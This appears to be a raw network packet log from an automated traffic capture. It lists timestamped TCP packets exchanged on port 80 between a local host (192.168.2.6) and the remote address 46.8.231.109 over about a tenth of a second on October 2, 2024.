                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553828001 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553843021 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553867102 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553905964 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553934097 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553944111 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553950071 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553953886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553963900 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553971052 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553976059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553992033 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554047108 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554064035 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554073095 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554121017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554130077 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554138899 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554141998 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554147959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554151058 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554198027 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554198027 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554261923 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554271936 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554280043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554289103 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554297924 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554310083 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554339886 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554339886 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554368019 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554378033 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554533958 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554558039 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554574013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554583073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554627895 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554627895 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554637909 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554646969 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554656029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554666042 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554686069 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554701090 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554701090 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.554847956 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555180073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555190086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555201054 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555249929 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555249929 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555255890 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555265903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555275917 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555289030 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555335999 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555335999 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555357933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555373907 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555403948 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555463076 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555519104 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555529118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555538893 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555548906 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555558920 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555568933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555572987 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555579901 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555591106 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555599928 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555608988 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555651903 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555687904 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555699110 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555707932 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555727005 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555751085 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555785894 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555844069 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555871964 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555881977 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555891991 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555906057 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555915117 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555917978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555927038 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555927038 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555929899 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555939913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555953979 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555962086 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555984020 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.555984020 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556005001 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556015968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556025982 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556042910 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556056023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556065083 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556072950 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556076050 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556087971 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556097031 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556097031 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556099892 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556148052 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556148052 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556299925 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556310892 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556320906 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556330919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556339979 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556344032 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556365013 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.556408882 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640033007 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640074015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640083075 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640094995 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640126944 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640224934 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640238047 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640249014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640254021 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640254021 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640259981 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640306950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640317917 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640341997 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640377998 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640377998 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640420914 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640431881 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640441895 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640450954 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640460968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640466928 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640466928 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640480042 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640517950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640541077 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640579939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640589952 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640600920 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640610933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640614033 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640671968 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640706062 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640717030 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640726089 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640765905 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640779018 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640803099 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640872955 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640873909 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640883923 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640894890 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640908957 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640918970 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640944958 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.640985012 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641006947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641017914 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641053915 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641058922 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641077995 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641088009 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641097069 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641103029 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641103029 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641119957 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641180992 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641223907 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641237974 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641248941 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641259909 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641269922 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641269922 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641320944 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641320944 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641407013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641417027 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641427040 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641438007 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641448021 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641469002 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641515017 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641530991 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641532898 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641546965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641706944 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641716003 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641731024 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641733885 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641745090 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641755104 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641763926 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641772985 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641779900 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641779900 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641783953 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641791105 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641801119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641825914 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641885042 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641982079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.641992092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642003059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642013073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642023087 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642031908 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642040014 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642040968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642067909 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642117977 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642127991 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642143011 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642146111 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642154932 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642164946 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642174959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642179966 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642199993 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642287016 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642319918 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642330885 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642414093 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642587900 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642596960 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642610073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642617941 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642626047 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642637014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642646074 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642656088 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642663956 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642663956 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642664909 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642688036 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642695904 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642704964 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642721891 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642745018 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642765999 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642779112 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642827988 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642827988 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642841101 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642851114 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642858982 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642885923 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642885923 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642961979 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642983913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.642993927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643003941 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643013000 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643023014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643030882 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643109083 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643140078 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643151045 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643158913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643168926 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643177032 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643183947 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643202066 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643265963 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643373013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.643394947 CEST805851546.8.231.109192.168.2.6
